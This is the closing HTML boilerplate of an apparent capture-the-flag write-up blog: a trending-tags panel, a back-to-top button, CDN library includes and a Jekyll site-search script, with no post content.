    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf-jeopardy/">ctf jeopardy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox/">hackthebox</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/forens/">forens</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox-easy/">hackthebox easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux/">linux</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/misc/">misc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">rce</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/crypto/">crypto</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask"></div>

    

    <!-- JavaScripts -->

    <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->




  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.7.1/dist/jquery.min.js,npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js,npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.10/dayjs.min.js,npm/dayjs@1.11.10/locale/en.min.js,npm/dayjs@1.11.10/plugin/relativeTime.min.js,npm/dayjs@1.11.10/plugin/localizedFormat.min.js,npm/tocbot@4.25.0/dist/tocbot.min.js"></script>






<script defer src="/assets/js/dist/post.min.js"></script>






    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  /* Note: dependent library will be loaded in `js-selector.html` */
  SimpleJekyllSearch({
    searchInput: document.getElementById('search-input'),
    resultsContainer: document.getElementById('search-results'),
    json: '/assets/js/data/search.json',
    searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
    noResultsText: '<p class="mt-5"></p>',
    templateMiddleware: function(prop, value, template) {
      if (prop === 'categories') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
        }
      }

      if (prop === 'tags') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
        }
      }
    }
  });
</script>

  </body>
</html>
